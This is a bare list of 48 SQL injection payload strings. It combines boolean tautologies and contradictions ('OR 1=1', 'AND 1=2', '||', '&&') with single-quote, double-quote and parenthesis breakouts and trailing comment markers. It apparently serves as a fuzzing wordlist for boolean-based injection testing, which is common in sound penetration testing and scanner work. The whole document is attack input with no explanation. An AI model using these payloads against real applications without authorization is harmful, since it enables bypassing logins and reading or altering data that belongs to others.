 OR 1=1
 || 1=1
 AND 1=2
 && 1=2
 OR 1=1 -- 
 || 1=1 -- 
 AND 1=2 -- 
 && 1=2 -- 
' OR 1=1
' || 1=1
' AND 1=2
' && 1=2
' OR 1=1 -- 
' || 1=1 -- 
' AND 1=2 -- 
' && 1=2 -- 
" OR 1=1
" || 1=1
" AND 1=2
" && 1=2
" OR 1=1 -- 
" || 1=1 -- 
" AND 1=2 -- 
" && 1=2 -- 
) OR 1=1
) || 1=1
) AND 1=2
) && 1=2
) OR 1=1 -- 
) || 1=1 -- 
) AND 1=2 -- 
) && 1=2 -- 
') OR 1=1
') || 1=1
') AND 1=2
') && 1=2
') OR 1=1 -- 
') || 1=1 -- 
') AND 1=2 -- 
') && 1=2 -- 
") OR 1=1
") || 1=1
") AND 1=2
") && 1=2
") OR 1=1 -- 
") || 1=1 -- 
") AND 1=2 -- 
") && 1=2 -- 